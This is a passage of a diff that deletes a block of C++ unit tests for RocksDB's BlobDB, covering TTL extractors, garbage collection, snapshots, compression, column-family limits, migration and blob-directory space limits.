-  auto *bdb_impl = static_cast<BlobDBImpl *>(blob_db_);
-  auto blob_files = bdb_impl->TEST_GetBlobFiles();
-  ASSERT_EQ(1, blob_files.size());
-  ASSERT_FALSE(blob_files[0]->HasTTL());
-  ASSERT_OK(bdb_impl->TEST_CloseBlobFile(blob_files[0]));
-  GCStats gc_stats;
-  ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats));
-  ASSERT_EQ(0, gc_stats.num_deletes);
-  ASSERT_EQ(100, gc_stats.num_relocate);
-  VerifyDB(data);
-}
-
-TEST_F(BlobDBTest, TTLExtractor_ExtractTTL) {
-  Random rnd(301);
-  class TestTTLExtractor : public TTLExtractor {
-   public:
-    explicit TestTTLExtractor(Random *r) : rnd(r) {}
-
-    virtual bool ExtractTTL(const Slice &key, const Slice &value, uint64_t *ttl,
-                            std::string * /*new_value*/,
-                            bool * /*value_changed*/) override {
-      *ttl = rnd->Next() % 100;
-      if (*ttl > 50) {
-        data[key.ToString()] = value.ToString();
-      }
-      return true;
-    }
-
-    Random *rnd;
-    std::map<std::string, std::string> data;
-  };
-  ttl_extractor_.reset(new TestTTLExtractor(&rnd));
-  Options options;
-  options.env = mock_env_.get();
-  BlobDBOptions bdb_options;
-  bdb_options.ttl_range_secs = 1000;
-  bdb_options.min_blob_size = 0;
-  bdb_options.blob_file_size = 256 * 1000 * 1000;
-  bdb_options.ttl_extractor = ttl_extractor_;
-  bdb_options.disable_background_tasks = true;
-  Open(bdb_options, options);
-  mock_env_->set_current_time(50);
-  for (size_t i = 0; i < 100; i++) {
-    PutRandom("key" + ToString(i), &rnd);
-  }
-  mock_env_->set_current_time(100);
-  auto *bdb_impl = static_cast<BlobDBImpl *>(blob_db_);
-  auto blob_files = bdb_impl->TEST_GetBlobFiles();
-  ASSERT_EQ(1, blob_files.size());
-  ASSERT_TRUE(blob_files[0]->HasTTL());
-  ASSERT_OK(bdb_impl->TEST_CloseBlobFile(blob_files[0]));
-  GCStats gc_stats;
-  ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats));
-  auto &data = static_cast<TestTTLExtractor *>(ttl_extractor_.get())->data;
-  ASSERT_EQ(100 - data.size(), gc_stats.num_deletes);
-  ASSERT_EQ(data.size(), gc_stats.num_relocate);
-  VerifyDB(data);
-}
-
-TEST_F(BlobDBTest, TTLExtractor_ExtractExpiration) {
-  Random rnd(301);
-  class TestTTLExtractor : public TTLExtractor {
-   public:
-    explicit TestTTLExtractor(Random *r) : rnd(r) {}
-
-    virtual bool ExtractExpiration(const Slice &key, const Slice &value,
-                                   uint64_t /*now*/, uint64_t *expiration,
-                                   std::string * /*new_value*/,
-                                   bool * /*value_changed*/) override {
-      *expiration = rnd->Next() % 100 + 50;
-      if (*expiration > 100) {
-        data[key.ToString()] = value.ToString();
-      }
-      return true;
-    }
-
-    Random *rnd;
-    std::map<std::string, std::string> data;
-  };
-  ttl_extractor_.reset(new TestTTLExtractor(&rnd));
-  Options options;
-  options.env = mock_env_.get();
-  BlobDBOptions bdb_options;
-  bdb_options.ttl_range_secs = 1000;
-  bdb_options.min_blob_size = 0;
-  bdb_options.blob_file_size = 256 * 1000 * 1000;
-  bdb_options.ttl_extractor = ttl_extractor_;
-  bdb_options.disable_background_tasks = true;
-  Open(bdb_options, options);
-  mock_env_->set_current_time(50);
-  for (size_t i = 0; i < 100; i++) {
-    PutRandom("key" + ToString(i), &rnd);
-  }
-  mock_env_->set_current_time(100);
-  auto *bdb_impl = static_cast<BlobDBImpl *>(blob_db_);
-  auto blob_files = bdb_impl->TEST_GetBlobFiles();
-  ASSERT_EQ(1, blob_files.size());
-  ASSERT_TRUE(blob_files[0]->HasTTL());
-  ASSERT_OK(bdb_impl->TEST_CloseBlobFile(blob_files[0]));
-  GCStats gc_stats;
-  ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats));
-  auto &data = static_cast<TestTTLExtractor *>(ttl_extractor_.get())->data;
-  ASSERT_EQ(100 - data.size(), gc_stats.num_deletes);
-  ASSERT_EQ(data.size(), gc_stats.num_relocate);
-  VerifyDB(data);
-}
-
-TEST_F(BlobDBTest, TTLExtractor_ChangeValue) {
-  class TestTTLExtractor : public TTLExtractor {
-   public:
-    const Slice kTTLSuffix = Slice("ttl:");
-
-    bool ExtractTTL(const Slice & /*key*/, const Slice &value, uint64_t *ttl,
-                    std::string *new_value, bool *value_changed) override {
-      if (value.size() < 12) {
-        return false;
-      }
-      const char *p = value.data() + value.size() - 12;
-      if (kTTLSuffix != Slice(p, 4)) {
-        return false;
-      }
-      *ttl = DecodeFixed64(p + 4);
-      *new_value = Slice(value.data(), value.size() - 12).ToString();
-      *value_changed = true;
-      return true;
-    }
-  };
-  Random rnd(301);
-  Options options;
-  options.env = mock_env_.get();
-  BlobDBOptions bdb_options;
-  bdb_options.ttl_range_secs = 1000;
-  bdb_options.min_blob_size = 0;
-  bdb_options.blob_file_size = 256 * 1000 * 1000;
-  bdb_options.ttl_extractor = std::make_shared<TestTTLExtractor>();
-  bdb_options.disable_background_tasks = true;
-  Open(bdb_options, options);
-  std::map<std::string, std::string> data;
-  mock_env_->set_current_time(50);
-  for (size_t i = 0; i < 100; i++) {
-    int len = rnd.Next() % kMaxBlobSize + 1;
-    std::string key = "key" + ToString(i);
-    std::string value = test::RandomHumanReadableString(&rnd, len);
-    uint64_t ttl = rnd.Next() % 100;
-    std::string value_ttl = value + "ttl:";
-    PutFixed64(&value_ttl, ttl);
-    ASSERT_OK(blob_db_->Put(WriteOptions(), Slice(key), Slice(value_ttl)));
-    if (ttl > 50) {
-      data[key] = value;
-    }
-  }
-  mock_env_->set_current_time(100);
-  auto *bdb_impl = static_cast<BlobDBImpl *>(blob_db_);
-  auto blob_files = bdb_impl->TEST_GetBlobFiles();
-  ASSERT_EQ(1, blob_files.size());
-  ASSERT_TRUE(blob_files[0]->HasTTL());
-  ASSERT_OK(bdb_impl->TEST_CloseBlobFile(blob_files[0]));
-  GCStats gc_stats;
-  ASSERT_OK(bdb_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats));
-  ASSERT_EQ(100 - data.size(), gc_stats.num_deletes);
-  ASSERT_EQ(data.size(), gc_stats.num_relocate);
-  VerifyDB(data);
-}
-
-TEST_F(BlobDBTest, StackableDBGet) {
-  Random rnd(301);
-  BlobDBOptions bdb_options;
-  bdb_options.min_blob_size = 0;
-  bdb_options.disable_background_tasks = true;
-  Open(bdb_options);
-  std::map<std::string, std::string> data;
-  for (size_t i = 0; i < 100; i++) {
-    PutRandom("key" + ToString(i), &rnd, &data);
-  }
-  for (size_t i = 0; i < 100; i++) {
-    StackableDB *db = blob_db_;
-    ColumnFamilyHandle *column_family = db->DefaultColumnFamily();
-    std::string key = "key" + ToString(i);
-    PinnableSlice pinnable_value;
-    ASSERT_OK(db->Get(ReadOptions(), column_family, key, &pinnable_value));
-    std::string string_value;
-    ASSERT_OK(db->Get(ReadOptions(), column_family, key, &string_value));
-    ASSERT_EQ(string_value, pinnable_value.ToString());
-    ASSERT_EQ(string_value, data[key]);
-  }
-}
-
-TEST_F(BlobDBTest, WriteBatch) {
-  Random rnd(301);
-  BlobDBOptions bdb_options;
-  bdb_options.min_blob_size = 0;
-  bdb_options.disable_background_tasks = true;
-  Open(bdb_options);
-  std::map<std::string, std::string> data;
-  for (size_t i = 0; i < 100; i++) {
-    WriteBatch batch;
-    for (size_t j = 0; j < 10; j++) {
-      PutRandomToWriteBatch("key" + ToString(j * 100 + i), &rnd, &batch, &data);
-    }
-    blob_db_->Write(WriteOptions(), &batch);
-  }
-  VerifyDB(data);
-}
-
-TEST_F(BlobDBTest, Delete) {
-  Random rnd(301);
-  BlobDBOptions bdb_options;
-  bdb_options.min_blob_size = 0;
-  bdb_options.disable_background_tasks = true;
-  Open(bdb_options);
-  std::map<std::string, std::string> data;
-  for (size_t i = 0; i < 100; i++) {
-    PutRandom("key" + ToString(i), &rnd, &data);
-  }
-  for (size_t i = 0; i < 100; i += 5) {
-    Delete("key" + ToString(i), &data);
-  }
-  VerifyDB(data);
-}
-
-TEST_F(BlobDBTest, DeleteBatch) {
-  Random rnd(301);
-  BlobDBOptions bdb_options;
-  bdb_options.min_blob_size = 0;
-  bdb_options.disable_background_tasks = true;
-  Open(bdb_options);
-  for (size_t i = 0; i < 100; i++) {
-    PutRandom("key" + ToString(i), &rnd);
-  }
-  WriteBatch batch;
-  for (size_t i = 0; i < 100; i++) {
-    batch.Delete("key" + ToString(i));
-  }
-  ASSERT_OK(blob_db_->Write(WriteOptions(), &batch));
-  // DB should be empty.
-  VerifyDB({});
-}
-
-TEST_F(BlobDBTest, Override) {
-  Random rnd(301);
-  BlobDBOptions bdb_options;
-  bdb_options.min_blob_size = 0;
-  bdb_options.disable_background_tasks = true;
-  Open(bdb_options);
-  std::map<std::string, std::string> data;
-  for (int i = 0; i < 10000; i++) {
-    PutRandom("key" + ToString(i), &rnd, nullptr);
-  }
-  // override all the keys
-  for (int i = 0; i < 10000; i++) {
-    PutRandom("key" + ToString(i), &rnd, &data);
-  }
-  VerifyDB(data);
-}
-
-#ifdef SNAPPY
-TEST_F(BlobDBTest, Compression) {
-  Random rnd(301);
-  BlobDBOptions bdb_options;
-  bdb_options.min_blob_size = 0;
-  bdb_options.disable_background_tasks = true;
-  bdb_options.compression = CompressionType::kSnappyCompression;
-  Open(bdb_options);
-  std::map<std::string, std::string> data;
-  for (size_t i = 0; i < 100; i++) {
-    PutRandom("put-key" + ToString(i), &rnd, &data);
-  }
-  for (int i = 0; i < 100; i++) {
-    WriteBatch batch;
-    for (size_t j = 0; j < 10; j++) {
-      PutRandomToWriteBatch("write-batch-key" + ToString(j * 100 + i), &rnd,
-                            &batch, &data);
-    }
-    blob_db_->Write(WriteOptions(), &batch);
-  }
-  VerifyDB(data);
-}
-
-TEST_F(BlobDBTest, DecompressAfterReopen) {
-  Random rnd(301);
-  BlobDBOptions bdb_options;
-  bdb_options.min_blob_size = 0;
-  bdb_options.disable_background_tasks = true;
-  bdb_options.compression = CompressionType::kSnappyCompression;
-  Open(bdb_options);
-  std::map<std::string, std::string> data;
-  for (size_t i = 0; i < 100; i++) {
-    PutRandom("put-key" + ToString(i), &rnd, &data);
-  }
-  VerifyDB(data);
-  bdb_options.compression = CompressionType::kNoCompression;
-  Reopen(bdb_options);
-  VerifyDB(data);
-}
-
-#endif
-
-TEST_F(BlobDBTest, MultipleWriters) {
-  Open(BlobDBOptions());
-
-  std::vector<port::Thread> workers;
-  std::vector<std::map<std::string, std::string>> data_set(10);
-  for (uint32_t i = 0; i < 10; i++)
-    workers.push_back(port::Thread(
-        [&](uint32_t id) {
-          Random rnd(301 + id);
-          for (int j = 0; j < 100; j++) {
-            std::string key = "key" + ToString(id) + "_" + ToString(j);
-            if (id < 5) {
-              PutRandom(key, &rnd, &data_set[id]);
-            } else {
-              WriteBatch batch;
-              PutRandomToWriteBatch(key, &rnd, &batch, &data_set[id]);
-              blob_db_->Write(WriteOptions(), &batch);
-            }
-          }
-        },
-        i));
-  std::map<std::string, std::string> data;
-  for (size_t i = 0; i < 10; i++) {
-    workers[i].join();
-    data.insert(data_set[i].begin(), data_set[i].end());
-  }
-  VerifyDB(data);
-}
-
-TEST_F(BlobDBTest, GCAfterOverwriteKeys) {
-  Random rnd(301);
-  BlobDBOptions bdb_options;
-  bdb_options.min_blob_size = 0;
-  bdb_options.disable_background_tasks = true;
-  Open(bdb_options);
-  DBImpl *db_impl = static_cast_with_check<DBImpl, DB>(blob_db_->GetBaseDB());
-  std::map<std::string, std::string> data;
-  for (int i = 0; i < 200; i++) {
-    PutRandom("key" + ToString(i), &rnd, &data);
-  }
-  auto blob_files = blob_db_impl()->TEST_GetBlobFiles();
-  ASSERT_EQ(1, blob_files.size());
-  ASSERT_OK(blob_db_impl()->TEST_CloseBlobFile(blob_files[0]));
-  // Test for data in SST
-  size_t new_keys = 0;
-  for (int i = 0; i < 100; i++) {
-    if (rnd.Next() % 2 == 1) {
-      new_keys++;
-      PutRandom("key" + ToString(i), &rnd, &data);
-    }
-  }
-  db_impl->TEST_FlushMemTable(true /*wait*/);
-  // Test for data in memtable
-  for (int i = 100; i < 200; i++) {
-    if (rnd.Next() % 2 == 1) {
-      new_keys++;
-      PutRandom("key" + ToString(i), &rnd, &data);
-    }
-  }
-  GCStats gc_stats;
-  ASSERT_OK(blob_db_impl()->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats));
-  ASSERT_EQ(200, gc_stats.blob_count);
-  ASSERT_EQ(0, gc_stats.num_deletes);
-  ASSERT_EQ(200 - new_keys, gc_stats.num_relocate);
-  VerifyDB(data);
-}
-
-TEST_F(BlobDBTest, GCRelocateKeyWhileOverwriting) {
-  Random rnd(301);
-  BlobDBOptions bdb_options;
-  bdb_options.min_blob_size = 0;
-  bdb_options.disable_background_tasks = true;
-  Open(bdb_options);
-  ASSERT_OK(blob_db_->Put(WriteOptions(), "foo", "v1"));
-  auto blob_files = blob_db_impl()->TEST_GetBlobFiles();
-  ASSERT_EQ(1, blob_files.size());
-  ASSERT_OK(blob_db_impl()->TEST_CloseBlobFile(blob_files[0]));
-
-  SyncPoint::GetInstance()->LoadDependency(
-      {{"BlobDBImpl::GCFileAndUpdateLSM:AfterGetFromBaseDB",
-        "BlobDBImpl::PutUntil:Start"},
-       {"BlobDBImpl::PutUntil:Finish",
-        "BlobDBImpl::GCFileAndUpdateLSM:BeforeRelocate"}});
-  SyncPoint::GetInstance()->EnableProcessing();
-
-  auto writer = port::Thread(
-      [this]() { ASSERT_OK(blob_db_->Put(WriteOptions(), "foo", "v2")); });
-
-  GCStats gc_stats;
-  ASSERT_OK(blob_db_impl()->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats));
-  ASSERT_EQ(1, gc_stats.blob_count);
-  ASSERT_EQ(0, gc_stats.num_deletes);
-  ASSERT_EQ(1, gc_stats.num_relocate);
-  ASSERT_EQ(0, gc_stats.relocate_succeeded);
-  ASSERT_EQ(1, gc_stats.overwritten_while_relocate);
-  writer.join();
-  VerifyDB({{"foo", "v2"}});
-}
-
-TEST_F(BlobDBTest, GCExpiredKeyWhileOverwriting) {
-  Random rnd(301);
-  Options options;
-  options.env = mock_env_.get();
-  BlobDBOptions bdb_options;
-  bdb_options.min_blob_size = 0;
-  bdb_options.disable_background_tasks = true;
-  Open(bdb_options, options);
-  mock_env_->set_current_time(100);
-  ASSERT_OK(blob_db_->PutUntil(WriteOptions(), "foo", "v1", 200));
-  auto blob_files = blob_db_impl()->TEST_GetBlobFiles();
-  ASSERT_EQ(1, blob_files.size());
-  ASSERT_OK(blob_db_impl()->TEST_CloseBlobFile(blob_files[0]));
-  mock_env_->set_current_time(300);
-
-  SyncPoint::GetInstance()->LoadDependency(
-      {{"BlobDBImpl::GCFileAndUpdateLSM:AfterGetFromBaseDB",
-        "BlobDBImpl::PutUntil:Start"},
-       {"BlobDBImpl::PutUntil:Finish",
-        "BlobDBImpl::GCFileAndUpdateLSM:BeforeDelete"}});
-  SyncPoint::GetInstance()->EnableProcessing();
-
-  auto writer = port::Thread([this]() {
-    ASSERT_OK(blob_db_->PutUntil(WriteOptions(), "foo", "v2", 400));
-  });
-
-  GCStats gc_stats;
-  ASSERT_OK(blob_db_impl()->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats));
-  ASSERT_EQ(1, gc_stats.blob_count);
-  ASSERT_EQ(1, gc_stats.num_deletes);
-  ASSERT_EQ(0, gc_stats.delete_succeeded);
-  ASSERT_EQ(1, gc_stats.overwritten_while_delete);
-  ASSERT_EQ(0, gc_stats.num_relocate);
-  writer.join();
-  VerifyDB({{"foo", "v2"}});
-}
-
-// This test is no longer valid since we now return an error when we go
-// over the configured blob_dir_size.
-// The test needs to be re-written later in such a way that writes continue
-// after a GC happens.
-TEST_F(BlobDBTest, DISABLED_GCOldestSimpleBlobFileWhenOutOfSpace) {
-  // Use mock env to stop wall clock.
-  Options options;
-  options.env = mock_env_.get();
-  BlobDBOptions bdb_options;
-  bdb_options.blob_dir_size = 100;
-  bdb_options.blob_file_size = 100;
-  bdb_options.min_blob_size = 0;
-  bdb_options.disable_background_tasks = true;
-  Open(bdb_options);
-  std::string value(100, 'v');
-  ASSERT_OK(blob_db_->PutWithTTL(WriteOptions(), "key_with_ttl", value, 60));
-  for (int i = 0; i < 10; i++) {
-    ASSERT_OK(blob_db_->Put(WriteOptions(), "key" + ToString(i), value));
-  }
-  auto blob_files = blob_db_impl()->TEST_GetBlobFiles();
-  ASSERT_EQ(11, blob_files.size());
-  ASSERT_TRUE(blob_files[0]->HasTTL());
-  ASSERT_TRUE(blob_files[0]->Immutable());
-  for (int i = 1; i <= 10; i++) {
-    ASSERT_FALSE(blob_files[i]->HasTTL());
-    if (i < 10) {
-      ASSERT_TRUE(blob_files[i]->Immutable());
-    }
-  }
-  blob_db_impl()->TEST_RunGC();
-  // The oldest simple blob file (i.e. blob_files[1]) has been selected for GC.
-  auto obsolete_files = blob_db_impl()->TEST_GetObsoleteFiles();
-  ASSERT_EQ(1, obsolete_files.size());
-  ASSERT_EQ(blob_files[1]->BlobFileNumber(),
-            obsolete_files[0]->BlobFileNumber());
-}
-
-TEST_F(BlobDBTest, ReadWhileGC) {
-  // run the same test for Get(), MultiGet() and Iterator each.
-  for (int i = 0; i < 2; i++) {
-    BlobDBOptions bdb_options;
-    bdb_options.min_blob_size = 0;
-    bdb_options.disable_background_tasks = true;
-    Open(bdb_options);
-    blob_db_->Put(WriteOptions(), "foo", "bar");
-    auto blob_files = blob_db_impl()->TEST_GetBlobFiles();
-    ASSERT_EQ(1, blob_files.size());
-    std::shared_ptr<BlobFile> bfile = blob_files[0];
-    uint64_t bfile_number = bfile->BlobFileNumber();
-    ASSERT_OK(blob_db_impl()->TEST_CloseBlobFile(bfile));
-
-    switch (i) {
-      case 0:
-        SyncPoint::GetInstance()->LoadDependency(
-            {{"BlobDBImpl::Get:AfterIndexEntryGet:1",
-              "BlobDBTest::ReadWhileGC:1"},
-             {"BlobDBTest::ReadWhileGC:2",
-              "BlobDBImpl::Get:AfterIndexEntryGet:2"}});
-        break;
-      case 1:
-        SyncPoint::GetInstance()->LoadDependency(
-            {{"BlobDBIterator::UpdateBlobValue:Start:1",
-              "BlobDBTest::ReadWhileGC:1"},
-             {"BlobDBTest::ReadWhileGC:2",
-              "BlobDBIterator::UpdateBlobValue:Start:2"}});
-        break;
-    }
-    SyncPoint::GetInstance()->EnableProcessing();
-
-    auto reader = port::Thread([this, i]() {
-      std::string value;
-      std::vector<std::string> values;
-      std::vector<Status> statuses;
-      switch (i) {
-        case 0:
-          ASSERT_OK(blob_db_->Get(ReadOptions(), "foo", &value));
-          ASSERT_EQ("bar", value);
-          break;
-        case 1:
-          // VerifyDB use iterator to scan the DB.
-          VerifyDB({{"foo", "bar"}});
-          break;
-      }
-    });
-
-    TEST_SYNC_POINT("BlobDBTest::ReadWhileGC:1");
-    GCStats gc_stats;
-    ASSERT_OK(blob_db_impl()->TEST_GCFileAndUpdateLSM(bfile, &gc_stats));
-    ASSERT_EQ(1, gc_stats.blob_count);
-    ASSERT_EQ(1, gc_stats.num_relocate);
-    ASSERT_EQ(1, gc_stats.relocate_succeeded);
-    blob_db_impl()->TEST_DeleteObsoleteFiles();
-    // The file shouln't be deleted
-    blob_files = blob_db_impl()->TEST_GetBlobFiles();
-    ASSERT_EQ(2, blob_files.size());
-    ASSERT_EQ(bfile_number, blob_files[0]->BlobFileNumber());
-    auto obsolete_files = blob_db_impl()->TEST_GetObsoleteFiles();
-    ASSERT_EQ(1, obsolete_files.size());
-    ASSERT_EQ(bfile_number, obsolete_files[0]->BlobFileNumber());
-    TEST_SYNC_POINT("BlobDBTest::ReadWhileGC:2");
-    reader.join();
-    SyncPoint::GetInstance()->DisableProcessing();
-
-    // The file is deleted this time
-    blob_db_impl()->TEST_DeleteObsoleteFiles();
-    blob_files = blob_db_impl()->TEST_GetBlobFiles();
-    ASSERT_EQ(1, blob_files.size());
-    ASSERT_NE(bfile_number, blob_files[0]->BlobFileNumber());
-    ASSERT_EQ(0, blob_db_impl()->TEST_GetObsoleteFiles().size());
-    VerifyDB({{"foo", "bar"}});
-    Destroy();
-  }
-}
-
-TEST_F(BlobDBTest, SnapshotAndGarbageCollection) {
-  BlobDBOptions bdb_options;
-  bdb_options.min_blob_size = 0;
-  bdb_options.disable_background_tasks = true;
-  // i = when to take snapshot
-  for (int i = 0; i < 4; i++) {
-    for (bool delete_key : {true, false}) {
-      const Snapshot *snapshot = nullptr;
-      Destroy();
-      Open(bdb_options);
-      // First file
-      ASSERT_OK(Put("key1", "value"));
-      if (i == 0) {
-        snapshot = blob_db_->GetSnapshot();
-      }
-      auto blob_files = blob_db_impl()->TEST_GetBlobFiles();
-      ASSERT_EQ(1, blob_files.size());
-      ASSERT_OK(blob_db_impl()->TEST_CloseBlobFile(blob_files[0]));
-      // Second file
-      ASSERT_OK(Put("key2", "value"));
-      if (i == 1) {
-        snapshot = blob_db_->GetSnapshot();
-      }
-      blob_files = blob_db_impl()->TEST_GetBlobFiles();
-      ASSERT_EQ(2, blob_files.size());
-      auto bfile = blob_files[1];
-      ASSERT_FALSE(bfile->Immutable());
-      ASSERT_OK(blob_db_impl()->TEST_CloseBlobFile(bfile));
-      // Third file
-      ASSERT_OK(Put("key3", "value"));
-      if (i == 2) {
-        snapshot = blob_db_->GetSnapshot();
-      }
-      if (delete_key) {
-        Delete("key2");
-      }
-      GCStats gc_stats;
-      ASSERT_OK(blob_db_impl()->TEST_GCFileAndUpdateLSM(bfile, &gc_stats));
-      ASSERT_TRUE(bfile->Obsolete());
-      ASSERT_EQ(1, gc_stats.blob_count);
-      if (delete_key) {
-        ASSERT_EQ(0, gc_stats.num_relocate);
-        ASSERT_EQ(bfile->GetSequenceRange().second + 1,
-                  bfile->GetObsoleteSequence());
-      } else {
-        ASSERT_EQ(1, gc_stats.num_relocate);
-        ASSERT_EQ(blob_db_->GetLatestSequenceNumber(),
-                  bfile->GetObsoleteSequence());
-      }
-      if (i == 3) {
-        snapshot = blob_db_->GetSnapshot();
-      }
-      size_t num_files = delete_key ? 3 : 4;
-      ASSERT_EQ(num_files, blob_db_impl()->TEST_GetBlobFiles().size());
-      blob_db_impl()->TEST_DeleteObsoleteFiles();
-      if (i == 0 || i == 3 || (i == 2 && delete_key)) {
-        // The snapshot shouldn't see data in bfile
-        ASSERT_EQ(num_files - 1, blob_db_impl()->TEST_GetBlobFiles().size());
-        blob_db_->ReleaseSnapshot(snapshot);
-      } else {
-        // The snapshot will see data in bfile, so the file shouldn't be deleted
-        ASSERT_EQ(num_files, blob_db_impl()->TEST_GetBlobFiles().size());
-        blob_db_->ReleaseSnapshot(snapshot);
-        blob_db_impl()->TEST_DeleteObsoleteFiles();
-        ASSERT_EQ(num_files - 1, blob_db_impl()->TEST_GetBlobFiles().size());
-      }
-    }
-  }
-}
-
-TEST_F(BlobDBTest, ColumnFamilyNotSupported) {
-  Options options;
-  options.env = mock_env_.get();
-  mock_env_->set_current_time(0);
-  Open(BlobDBOptions(), options);
-  ColumnFamilyHandle *default_handle = blob_db_->DefaultColumnFamily();
-  ColumnFamilyHandle *handle = nullptr;
-  std::string value;
-  std::vector<std::string> values;
-  // The call simply pass through to base db. It should succeed.
-  ASSERT_OK(
-      blob_db_->CreateColumnFamily(ColumnFamilyOptions(), "foo", &handle));
-  ASSERT_TRUE(blob_db_->Put(WriteOptions(), handle, "k", "v").IsNotSupported());
-  ASSERT_TRUE(blob_db_->PutWithTTL(WriteOptions(), handle, "k", "v", 60)
-                  .IsNotSupported());
-  ASSERT_TRUE(blob_db_->PutUntil(WriteOptions(), handle, "k", "v", 100)
-                  .IsNotSupported());
-  WriteBatch batch;
-  batch.Put("k1", "v1");
-  batch.Put(handle, "k2", "v2");
-  ASSERT_TRUE(blob_db_->Write(WriteOptions(), &batch).IsNotSupported());
-  ASSERT_TRUE(blob_db_->Get(ReadOptions(), "k1", &value).IsNotFound());
-  ASSERT_TRUE(
-      blob_db_->Get(ReadOptions(), handle, "k", &value).IsNotSupported());
-  auto statuses = blob_db_->MultiGet(ReadOptions(), {default_handle, handle},
-                                     {"k1", "k2"}, &values);
-  ASSERT_EQ(2, statuses.size());
-  ASSERT_TRUE(statuses[0].IsNotSupported());
-  ASSERT_TRUE(statuses[1].IsNotSupported());
-  ASSERT_EQ(nullptr, blob_db_->NewIterator(ReadOptions(), handle));
-  delete handle;
-}
-
-TEST_F(BlobDBTest, GetLiveFilesMetaData) {
-  Random rnd(301);
-  BlobDBOptions bdb_options;
-  bdb_options.min_blob_size = 0;
-  bdb_options.disable_background_tasks = true;
-  Open(bdb_options);
-  std::map<std::string, std::string> data;
-  for (size_t i = 0; i < 100; i++) {
-    PutRandom("key" + ToString(i), &rnd, &data);
-  }
-  auto *bdb_impl = static_cast<BlobDBImpl *>(blob_db_);
-  std::vector<LiveFileMetaData> metadata;
-  bdb_impl->GetLiveFilesMetaData(&metadata);
-  ASSERT_EQ(1U, metadata.size());
-  std::string filename = dbname_ + "/blob_dir/000001.blob";
-  ASSERT_EQ(filename, metadata[0].name);
-  ASSERT_EQ("default", metadata[0].column_family_name);
-  std::vector<std::string> livefile;
-  uint64_t mfs;
-  bdb_impl->GetLiveFiles(livefile, &mfs, false);
-  ASSERT_EQ(4U, livefile.size());
-  ASSERT_EQ(filename, livefile[3]);
-  VerifyDB(data);
-}
-
-TEST_F(BlobDBTest, MigrateFromPlainRocksDB) {
-  constexpr size_t kNumKey = 20;
-  constexpr size_t kNumIteration = 10;
-  Random rnd(301);
-  std::map<std::string, std::string> data;
-  std::vector<bool> is_blob(kNumKey, false);
-
-  // Write to plain rocksdb.
-  Options options;
-  options.create_if_missing = true;
-  DB *db = nullptr;
-  ASSERT_OK(DB::Open(options, dbname_, &db));
-  for (size_t i = 0; i < kNumIteration; i++) {
-    auto key_index = rnd.Next() % kNumKey;
-    std::string key = "key" + ToString(key_index);
-    PutRandom(db, key, &rnd, &data);
-  }
-  VerifyDB(db, data);
-  delete db;
-  db = nullptr;
-
-  // Open as blob db. Verify it can read existing data.
-  Open();
-  VerifyDB(blob_db_, data);
-  for (size_t i = 0; i < kNumIteration; i++) {
-    auto key_index = rnd.Next() % kNumKey;
-    std::string key = "key" + ToString(key_index);
-    is_blob[key_index] = true;
-    PutRandom(blob_db_, key, &rnd, &data);
-  }
-  VerifyDB(blob_db_, data);
-  delete blob_db_;
-  blob_db_ = nullptr;
-
-  // Verify plain db return error for keys written by blob db.
-  ASSERT_OK(DB::Open(options, dbname_, &db));
-  std::string value;
-  for (size_t i = 0; i < kNumKey; i++) {
-    std::string key = "key" + ToString(i);
-    Status s = db->Get(ReadOptions(), key, &value);
-    if (data.count(key) == 0) {
-      ASSERT_TRUE(s.IsNotFound());
-    } else if (is_blob[i]) {
-      ASSERT_TRUE(s.IsNotSupported());
-    } else {
-      ASSERT_OK(s);
-      ASSERT_EQ(data[key], value);
-    }
-  }
-  delete db;
-}
-
-// Test to verify that a NoSpace IOError Status is returned on reaching
-// blob_dir_size limit.
-TEST_F(BlobDBTest, OutOfSpace) {
-  // Use mock env to stop wall clock.
-  Options options;
-  options.env = mock_env_.get();
-  BlobDBOptions bdb_options;
-  bdb_options.blob_dir_size = 150;
-  bdb_options.disable_background_tasks = true;
-  Open(bdb_options);
-
-  // Each stored blob has an overhead of about 42 bytes currently.
-  // So a small key + a 100 byte blob should take up ~150 bytes in the db.
-  std::string value(100, 'v');
-  ASSERT_OK(blob_db_->PutWithTTL(WriteOptions(), "key1", value, 60));
-
-  // Putting another blob should fail as ading it would exceed the blob_dir_size
-  // limit.
-  Status s = blob_db_->PutWithTTL(WriteOptions(), "key2", value, 60);
-  ASSERT_TRUE(s.IsIOError());
-  ASSERT_TRUE(s.IsNoSpace());
-}
-
-TEST_F(BlobDBTest, EvictOldestFileWhenCloseToSpaceLimit) {
-  // Use mock env to stop wall clock.
-  Options options;
-  BlobDBOptions bdb_options;
-  bdb_options.blob_dir_size = 270;
-  bdb_options.blob_file_size = 100;
-  bdb_options.disable_background_tasks = true;
-  bdb_options.is_fifo = true;
-  Open(bdb_options);
-
-  // Each stored blob has an overhead of 32 bytes currently.
-  // So a 100 byte blob should take up 132 bytes.
-  std::string value(100, 'v');
-  ASSERT_OK(blob_db_->PutWithTTL(WriteOptions(), "key1", value, 10));
-
-  auto *bdb_impl = static_cast<BlobDBImpl *>(blob_db_);
-  auto blob_files = bdb_impl->TEST_GetBlobFiles();
-  ASSERT_EQ(1, blob_files.size());
-
-  // Adding another 100 byte blob would take the total size to 264 bytes
-  // (2*132), which is more than 90% of blob_dir_size. So, the oldest file
-  // should be evicted and put in obsolete files list.
-  ASSERT_OK(blob_db_->PutWithTTL(WriteOptions(), "key2", value, 60));
-
-  auto obsolete_files = bdb_impl->TEST_GetObsoleteFiles();
-  ASSERT_EQ(1, obsolete_files.size());
-  ASSERT_TRUE(obsolete_files[0]->Immutable());
-  ASSERT_EQ(blob_files[0]->BlobFileNumber(),
-            obsolete_files[0]->BlobFileNumber());
-
-  bdb_impl->TEST_DeleteObsoleteFiles();
-  obsolete_files = bdb_impl->TEST_GetObsoleteFiles();
-  ASSERT_TRUE(obsolete_files.empty());
-}
-
-TEST_F(BlobDBTest, InlineSmallValues) {
-  constexpr uint64_t kMaxExpiration = 1000;
-  Random rnd(301);
-  BlobDBOptions bdb_options;
-  bdb_options.ttl_range_secs = kMaxExpiration;
-  bdb_options.min_blob_size = 100;
-  bdb_options.blob_file_size = 256 * 1000 * 1000;
-  bdb_options.disable_background_tasks = true;
-  Options options;
